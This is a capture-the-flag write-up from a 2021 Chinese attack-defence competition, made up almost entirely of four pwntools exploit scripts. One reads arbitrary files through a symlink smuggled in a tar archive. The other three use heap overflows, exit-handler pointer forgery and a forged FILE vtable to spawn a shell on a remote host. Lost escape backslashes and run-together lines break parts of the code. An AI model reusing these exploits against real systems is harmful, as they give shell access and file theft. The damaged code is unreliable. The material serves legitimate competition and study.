2021网络安全领军人才攻防大赛 | Pwn方向WP



01


qtar


#coding:utf-8
# Exploit script for the "qtar" challenge.  The service exposes upload ('u'),
# compress ('c'), extract ('x') and read ('r') operations on files under /tmp.
# The script feeds it a tar archive that contains a symbolic link and lets the
# service's own extract step create that link, so that the final read follows
# it to a path of the script's choosing.  From a defensive point of view the
# root cause is an extractor that honours link members of an untrusted archive
# (and a reader that follows them): a hardened extractor rejects link members
# and any member path that resolves outside its working directory before it
# creates anything.
# NOTE(review): the page this was recovered from appears to have dropped the
# backslashes of escape sequences -- ljust(4, '') / ljust(8, '') and ru('n')
# below were most likely '\x00' and '\n' in the original.  Tokens are
# reproduced exactly as found; str.ljust() with an empty fill string raises
# TypeError, so uu32/uu64 cannot work as written.
from pwn import *

# Short aliases over the pwntools tube `p`, which is bound below from argv.
se = lambda data :p.send(data)
sa = lambda delim,data :p.sendafter(delim, data)
sl = lambda data :p.sendline(data)
sla = lambda delim,data :p.sendlineafter(delim, data)
sea = lambda delim,data :p.sendafter(delim, data)  # same as sa()
rc = lambda numb=4096 :p.recv(numb)
ru = lambda delims, drop=True :p.recvuntil(delims, drop)
# Pad a short little-endian leak to 4 / 8 bytes before unpacking (the fill
# string is empty here -- see the NOTE above).
uu32 = lambda data :u32(data.ljust(4, ''))
uu64 = lambda data :u64(data.ljust(8, ''))
info_addr = lambda tag, addr :p.info(tag + ': {:#x}'.format(addr))

# Remote only: host and port are taken from the command line (Python 2 print).
if len(sys.argv)<3:
    print 'usage: ./exp.py host port'
    exit()
elif len(sys.argv)==3:
    p = remote(sys.argv[1],sys.argv[2])
# context.log_level = 'debug'

def upload(data):
    """Upload `data`; return the 32 bytes following 'as /tmp/' in the reply,
    i.e. the name the service stored the file under."""
    sla('> ','u')
    sla('Content:',data)
    ru('as /tmp/')
    return rc(32)

def compress(filename, arcname):
    """Compress /tmp/`filename`, answering 'y' to the rename prompt and giving
    `arcname` as the archive name; return the 32 bytes the service reports
    after 'as ' (the stored name of the result)."""
    sla('> ','c')
    sla('Filename: /tmp/',filename)
    sla('Rename archive file? [y/N]','y')
    sla('Arcname: ',arcname)
    ru('as ')
    return rc(32)

def extract(filename):
    """Ask the service to extract `filename`; nothing is read back."""
    sla('> ','x')
    sla('Filename:',filename)

def readfile(filename):
    """Read `filename` through the service and return the reply up to the
    delimiter 'n' (most likely a newline originally -- see the NOTE above)."""
    sla('> ','r')
    sla('Filename:',filename)
    return ru('n')

def leak(filename):
    """Return the contents of `filename` as read back through the service.

    Steps, each visible below:
      1. upload a dummy file f1 and compress it under the name 'maxbos',
         which yields the service-side name c1;
      2. locally create a symlink named c1 -> `filename`, tar it, and upload
         that tar as f2;
      3. compress f2 under the name c1 (giving c2), extract c2 so that c1
         now holds the tar, then extract c1 so the link member is created;
      4. read c1 -- the service follows the link to `filename`.
    How the service resolves names in step 3 is inferred from this flow
    (and the original author's comments), not confirmed here.
    """
    f1 = upload('maxbos know the flag')
    log.info('uploaded file: '+f1)
    c1 = compress(f1,'maxbos')  # creates the name later used for the soft link
    log.info('compressed file: '+c1)
    log.info('archive file name: '+'maxbos')
    # create soft link file (locally) and wrap it in a tar archive
    os.system('ln -s %s %s'%(filename, c1))  # create the soft link mentioned above
    os.system('tar cvf payload.tar '+c1+' >/dev/null')
    payload = open('payload.tar').read()  # file handle is never closed
    f2 = upload(payload)  # upload the archive
    log.info('uploaded file '+f2)
    c2 = compress(f2, c1)  # compress the archive under the name c1
    log.info('compressed file: '+c2)
    log.info('archive file name: '+c1)
    extract(c2)  # extract once; c1 now points at the tar archive
    log.info('extract '+c2+' --> '+c1)  # extract
    extract(c1)  # extract c1 again, which yields the link member directly
    log.info('extract '+c1+' --> '+c1)
    log.info('readfile: '+c1)
    data = readfile(c1)
    log.success('data:'+data)
    return data

# Field index 3 of /proc/self/stat is the parent pid (ppid) per proc(5), as
# long as the comm field contains no spaces; the flag is therefore read from
# the parent process's working directory.
pid = leak('/proc/self/stat').split()[3]
print pid
flag = leak('/proc/%s/cwd/flag'%pid)
# flag = leak('/ho\me/ctf/flag')
print flag
p.close()



02


2a1


#!/usr/bin/python from pwn import *import sys#from LibcSearcher import LibcSearchercontext.log_level = 'debug'context.arch='amd64' local=0binary_name='2+1'libc_name='/lib/x86_64-linux-gnu/libc.so.6'if local:    p=process("./"+binary_name)    libc=ELF(libc_name)    #p = process(["qemu-arm", "-L", "/usr/arm-linux-gnueabihf", "./"+binary_name])    #p = process(argv=["./qemu-arm", "-L", "/usr/arm-linux-gnueabihf", "-g", "1234", "./"+binary_name])else:    p=remote('121.40.203.104',49525)    e=ELF("./"+binary_name)    libc=ELF(libc_name) def z(a=''):    if local:        gdb.attach(p,a)        if a=='':            raw_input    else:        passru=lambda x:p.recvuntil(x)sl=lambda x:p.sendline(x)sd=lambda x:p.send(x)sa=lambda a,b:p.sendafter(a,b)sla=lambda a,b:p.sendlineafter(a,b)ia=lambda :p.interactive()def leak_address():    if(context.arch=='i386'):        return u32(p.recv(4))    else :        return u64(p.recv(6).ljust(8,'x00'))def ROR(i,index):    tmp = bin(i)[2:].rjust(64,"0")    for _ in range(index):        tmp = tmp[-1] + tmp[:-1]    return int(tmp, 2) def ROL(i,index):    tmp = bin(i)[2:].rjust(64, "0")    for _ in range(index):        tmp = tmp[1:] + tmp[0]    return int(tmp, 2) ru('Gift: ')libc_base = int(p.recvline()[:-1],16)-libc.sym['alarm']print(hex(libc_base))ptr = libc_base+0x3c5c58print(hex(ptr))dl_fini=libc_base+0x3daaf0sa('where to read?:',p64(ptr))ru('data: ')encode_ptr = u64(p.recv(8))print(hex(encode_ptr)) dl_fini_1 = ROL(dl_fini,0x11)print(hex(dl_fini),hex(dl_fini_1))key = dl_fini_1 ^ encode_ptrprint(hex(key))  exit_funcs=libc_base+0x3c45f8system_addr = libc_base+libc.sym['system']binsh = libc_base+libc.search('/bin/sh').next()encode_system = key ^ ROL(system_addr,0x11)sa('where to write?:',p64(exit_funcs))print(hex(system_addr))# gdb.attach(p)sa('msg:',b'a'*0x8+p64(1)+p64(4)+p64(encode_system)+p64(binsh))ia()



03


easy_pwn


#!/usr/bin/python from pwn import *import syscontext.log_level = 'debug'context.arch='amd64' local=0binary_name='pwn'libc_name='libc.so.6'if local:    p=process("./"+binary_name)    libc=ELF("./"+libc_name)else:    p=remote('121.40.203.104',45123)    e=ELF("./"+binary_name)    libc=ELF("./"+libc_name) ru=lambda x:p.recvuntil(x)sl=lambda x:p.sendline(x)sd=lambda x:p.send(x)sa=lambda a,b:p.sendafter(a,b)sla=lambda a,b:p.sendlineafter(a,b)ia=lambda :p.interactive()def leak_address():    if(context.arch=='i386'):        return u32(p.recv(4))    else :        return u64(p.recv(6).ljust(8,'x00')) def cho(num):    sla("choice:",str(num))def add():    cho(1)    sl('aaaaaaaa -> /bin/shx00bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb')    sl('ccccccccccccccccccc -> ddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddd')    sl('exit')def show():    cho(2)def gf():    cho(3)def edit(name,size,data):    cho(4)    sla("Non-Terminal:", name)    sla("size:",str(size))    sd(data) add()heap_rub = 'g'*0x18+p64(0x21)+p64(0)*3+p64(0x51)+'d'*0x40+p64(0)+p64(0x81)edit('c'*19,0x80000000,heap_rub+'x10')show()ru('Grammar:n')p.recv(2)heap_base = u64(p.recv(8))-0x250print(hex(heap_base))gf()edit('g'*19,0x80000000,heap_rub+p64(heap_base+0x600)+p64(0x400))show()libc_base = u64(p.recvuntil('x7fx00x00')[-8:].ljust(8, 'x00')) - 0x3c4ca8print(hex(libc_base))free_hook = libc_base+libc.sym['__free_hook']system = libc_base+libc.sym['system']edit('g'*19,0x80000000,heap_rub+p64(free_hook)+p64(8))a = 'x00'*8edit(a,0x8,p64(system))print(hex(system))show()ia()



04


easy_easy


#coding:utf-8
# Exploit for the "easy_easy" challenge (x86-64, glibc 2.23 -- the libc path
# below).  Menu: add(1) / edit(2) / delete(3) / show(4).  edit() writes a
# caller-supplied number of bytes without bounding it by the chunk size
# (edit(0,0x108,...) on a 0xf8-byte allocation), which is the heap overflow
# everything else builds on: leak libc and heap pointers, corrupt chunk
# headers to obtain overlapping allocations, then forge a FILE structure over
# _IO_2_1_stdout_ whose vtable points at a heap region filled with system().
# Defensive takeaways: (1) edit's length must be capped to the allocation;
# (2) glibc 2.24+ validates FILE vtable pointers against libc's own vtable
# section (IO_validate_vtable), which defeats the heap-resident fake vtable
# used here -- one reason to keep the C library current.
# NOTE(review): the page this was recovered from appears to have dropped
# escape-sequence backslashes ('x00', 'x7f', '/bin/shx00', ';shx00' were most
# likely '\x00', '\x7f', '/bin/sh\x00', ';sh\x00').  Tokens are reproduced as
# found.  `datadecode` and `FILE` are project-local helpers, not stdlib.
import sys
from pwn import *
from ctypes import CDLL
from datadecode import decode64,hex2str,decode32  # unused in the visible code
context.log_level='debug'
elfelf='./easy_easy'
#context.arch='amd64'
# The loop body was meant to be wrapped in try/except for retries (see the
# commented-out block at the end); as written it only exits via interactive().
while True :
  # try :
    elf=ELF(elfelf)
    context.arch=elf.arch
    gdb_text=''' telescope $rebase(0x202040) 16 '''
    # No argument: local process with gdb enabled; otherwise the remote target.
    # clibc / srand and one_gadgaet are set up but not used further below.
    if len(sys.argv)==1 :
        clibc=CDLL('/lib/x86_64-linux-gnu/libc-2.23.so')
        io=process(elfelf)
        gdb_open=1
        # io=process(['./'],env={'LD_PRELOAD':'./'})
        clibc.srand(clibc.time(0))
        libc=ELF('/lib/x86_64-linux-gnu/libc-2.23.so')
        # ld = ELF('/lib/x86_64-linux-gnu/ld-2.23.so')
        one_gadgaet=[0x45226,0x4527a,0xf03a4,0xf1247]
    else :
        clibc=CDLL('/lib/x86_64-linux-gnu/libc-2.23.so')
        io=remote('121.40.203.104',32233)
        gdb_open=0
        clibc.srand(clibc.time(0))
        libc=ELF('/lib/x86_64-linux-gnu/libc-2.23.so')
        # ld = ELF('/lib/x86_64-linux-gnu/ld-2.23.so')
        one_gadgaet=[0x45226,0x4527a,0xf03a4,0xf1247]

    def gdb_attach(io,a):
        """Attach gdb with gdbscript `a` only when gdb_open was set (local run)."""
        if gdb_open==1 :
            gdb.attach(io,a)

    def choice(a):
        """Pick menu entry `a`."""
        io.sendlineafter(': ',str(a))

    def add(a):
        """Menu 1: allocate a chunk of `a` bytes."""
        choice(1)
        io.sendlineafter('size: ',str(a))

    def edit(a,b,c):
        """Menu 2: write `b` bytes of `c` into chunk `a`.  `b` is not checked
        against the allocation -- this is the overflow primitive."""
        choice(2)
        io.sendlineafter('index: ',str(a))
        io.sendlineafter('size: ',str(b))
        io.sendafter('content:',c)

    def show(a):
        """Menu 4: print chunk `a`."""
        choice(4)
        io.sendlineafter('index: ',str(a))

    def delete(a):
        """Menu 3: free chunk `a`."""
        choice(3)
        io.sendlineafter('index: ',str(a))

    # Four 0xf8 and four 0xe8 allocations (indices 0-3 and 4-7).
    add(0xf8)
    add(0xf8)
    add(0xf8)
    add(0xf8)
    add(0xe8)
    add(0xe8)
    add(0xe8)
    add(0xe8)
    # Free chunk 1, overflow chunk 0 by 0x10 so show(0) runs into chunk 1's
    # freed metadata and prints a libc (main arena) pointer.
    delete(1)
    edit(0,0x108,'a'*0x108)
    show(0)
    # 6 leaked bytes padded to 8; the constant is the leaked pointer's distance
    # from __malloc_hook (arena layout of glibc 2.23).
    libc_base=u64(io.recvuntil('x7f')[-6:]+'x00x00')-libc.sym['__malloc_hook']-88-0x10
    libc.address=libc_base
    bin_sh_addr=libc.search('/bin/shx00').next()  # unused below
    system_addr=libc.sym['system']
    free_hook_addr=libc.sym['__free_hook']

    # Restore chunk 1's size field (0x101) and point its fd back into the arena.
    edit(0,0x200,'x00'*0xf8+p64(0x101)+p64(libc.sym['__malloc_hook']+0x10+88))
    # Same trick on chunks 2/3 to leak a heap pointer through show(2).
    delete(3)
    edit(2,0x108,'a'*0x101)
    show(2)
    io.recvuntil('a'*0x101)
    heap_base=u64('x00'+io.recv(5)+'x00x00')
    edit(2,0x208,'x00'*0xf8+p64(0x101)+'x00')
    # Corrupt chunk 1's fd/bk so a later allocation lands near __free_hook.
    edit(0,0x208,'x00'*0xf8+p64(0x101)+p64(heap_base)+p64(free_hook_addr+0x40))
    add(0xf8)
    # Steer a 0xe8 allocation onto _IO_2_1_stdout_ (minus 0x51 for alignment
    # of the fake size field).
    delete(5)
    edit(4,0x208,'x00'*0xe8+p64(0xf1)+p64(libc.sym['_IO_2_1_stdout_']-0x51))
    add(0xe8)
    add(0xe8)

    # Fill chunk 0 (which the fake vtable below points into, at heap_base-0x100)
    # with copies of system() so any vtable slot resolves to it.
    edit(0,0x100,p64(system_addr)*0x20)
    # Project-local model of struct _IO_FILE_plus.  All read/write pointers sit
    # at stdout+131 with buf_end one byte further (+132); vtable -> fake table.
    from FILE import *
    fake_file = IO_FILE_plus_struct()
    fake_file._flags = 0
    fake_file._IO_read_ptr=libc.sym['_IO_2_1_stdout_']+131
    fake_file._IO_read_end=libc.sym['_IO_2_1_stdout_']+131
    fake_file._IO_read_base=libc.sym['_IO_2_1_stdout_']+131
    fake_file._IO_write_base=libc.sym['_IO_2_1_stdout_']+131
    fake_file._IO_write_ptr=libc.sym['_IO_2_1_stdout_']+131
    fake_file._IO_write_end=libc.sym['_IO_2_1_stdout_']+131
    fake_file._IO_buf_base=libc.sym['_IO_2_1_stdout_']+131
    fake_file._IO_buf_end=libc.sym['_IO_2_1_stdout_']+132
    fake_file._mode=0
    fake_file.vtable=heap_base-0x100
    gdb_attach(io,gdb_text)
    # Overwrite stdout through the chunk placed on it: 0x41 bytes of padding,
    # the flags word 0xfbad1887 immediately followed by ';sh' + terminator.
    # Inferred: when a vtable call becomes system(fp), the FILE's own bytes are
    # read as the command -- the flag bytes form a failing first token and
    # `sh` runs.  The inserted stdout+0x1160 pointer splits the struct copy.
    edit(5,0x300,'x00'*0x41+p32(0xfbad1887)+';shx00'+str(fake_file)[8:0x88]+p64(libc.sym['_IO_2_1_stdout_']+0x1160)+str(fake_file)[0x90:])

    success('libc_base:'+hex(libc_base))
    success('heap_base:'+hex(heap_base))
    io.interactive()
    # except Exception as e:
    #     io.close()
    #     continue
    # else:
    #     continue


- END -

原文始发于微信公众号(山石网科安全技术研究院):2021网络安全领军人才攻防大赛 | Pwn方向WP
